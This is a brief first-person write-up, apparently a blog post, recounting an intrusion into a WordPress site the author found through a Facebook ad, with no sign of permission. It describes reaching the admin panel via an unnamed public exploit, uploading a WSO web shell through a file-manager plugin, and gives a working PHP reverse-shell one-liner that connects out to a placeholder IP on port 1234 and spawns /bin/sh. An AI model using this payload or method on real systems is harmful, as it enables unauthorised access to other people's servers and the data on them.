Exploit PHP shell to Webserver
22h00 28/06/2021:
I’m online facebook and watching stupid videos and the facebook ads is also catches my eye. I go to the website and it looks interesting. Okey play now
I. Access the wordpress admin panel
The webserver respone 301 status code for all request => Try with -s option
I have some dir but i cannot find more with them. I am continue enumeration and found the website is installed wordpress
Google is the best friend. I try with some exploit and can be access the admin panel :))
II. Upload webshell
I uploaded WSO with WP file manager :=)
WTH: disable PHP funtions:none =))
III. Reverse shell
I write the php code
<?php $sock=fsockopen(“X.X.X.X”,1234); exec(“/bin/sh -i <&3 >&3 2>&3”); ?>
And my linux
Go to the malicious php code
https://target.com/wordpress/shell.php
I got the reverse shell
I found the webserver have 7 website is running
Upload POC
:D